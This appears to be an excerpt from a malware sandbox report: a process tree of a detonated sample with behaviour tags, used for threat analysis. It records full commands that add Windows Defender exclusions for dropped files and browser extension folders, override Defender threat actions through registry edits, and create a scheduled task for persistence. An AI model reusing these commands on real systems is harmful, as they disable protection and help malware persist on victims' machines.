                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                            • Checks BIOS information in registry
                                                                            • Executes dropped EXE
                                                                            • Windows security modification
                                                                            • Checks whether UAC is enabled
                                                                            • Drops file in System32 directory
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:3696
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                          3⤵
                                                                            PID:2368
                                                                        • C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          • Suspicious behavior: AddClipboardFormatListener
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:2684
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'
                                                                            3⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4516
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'
                                                                            3⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3540
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'
                                                                            3⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4584
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                                                            3⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3800
                                                                          • C:\Windows\System32\schtasks.exe
                                                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"
                                                                            3⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:2176
                                                                        • C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:2316
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                          2⤵
                                                                          • Blocklisted process makes network request
                                                                          • Loads dropped DLL
                                                                          PID:2060
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3496 -ip 3496
                                                                        1⤵
                                                                          PID:5112
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3068 -ip 3068
                                                                          1⤵
                                                                            PID:2820
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2132 -ip 2132
                                                                            1⤵
                                                                              PID:4816
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                              1⤵
                                                                                PID:2472
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                1⤵
                                                                                  PID:2092
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exe Wt /LmNdidrjZR 385118 /S
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in System32 directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:1284
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                    2⤵
                                                                                      PID:3372
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                        3⤵
                                                                                          PID:3160
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                            4⤵
                                                                                              PID:920
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                5⤵
                                                                                                  PID:3480
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                              3⤵
                                                                                                PID:4768
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                  4⤵
                                                                                                    PID:560
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                      5⤵
                                                                                                        PID:4448
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                    3⤵
                                                                                                      PID:2844
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                        4⤵
                                                                                                          PID:1996
                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                            5⤵
                                                                                                              PID:2720
                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                          3⤵
                                                                                                            PID:3740
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                              4⤵
                                                                                                                PID:2536
                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                  5⤵
                                                                                                                    PID:1196
                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                3⤵
                                                                                                                  PID:4404
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                    4⤵
                                                                                                                      PID:4088
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                        5⤵
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1152
                                                                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                          6⤵
                                                                                                                            PID:4888
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                    2⤵
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:3684
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:2296
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                          4⤵
                                                                                                                            PID:3164
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:1980
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:392
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:2804
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:3964
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:4016
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:2144
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:2708
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:3608
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:980
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:4500
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:3584
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:2220
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1972
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3984
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4696
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1456
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:900
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5112
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3280
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3372
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2248
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:384
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4524
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4672
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4936
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4256
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3164
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:4820
                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1980
